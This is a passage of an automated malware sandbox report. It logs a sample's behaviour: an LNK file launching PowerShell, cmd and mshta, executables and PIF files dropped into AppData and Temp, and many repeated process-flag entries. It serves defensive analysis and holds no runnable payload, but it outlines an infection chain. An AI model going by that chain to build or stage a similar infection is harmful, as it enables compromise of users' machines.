              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF84887A61A push edx; iretd 8_2_00007FF84887A61B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF84887CBA4 push esp; retf 8_2_00007FF84887CBA5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF84887CBA0 push esp; retf 8_2_00007FF84887CBA1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF84887BCB5 push ebp; iretd 8_2_00007FF84887BCB8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF84887C0B8 push edx; retf 8_2_00007FF84887C0BB
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 12_2_00D87C59 push ecx; ret 12_2_00D87C6C

              Persistence and Installation Behavior

              barindex
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
              Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
              Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
              Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
              Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
              Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
              Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
              Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
              Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
              Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifFile created: C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.pifJump to dropped file
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\ProducingJump to dropped file
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifFile created: C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.pifJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\ClassroomEc.exeJump to dropped file
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\ProducingJump to dropped file
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
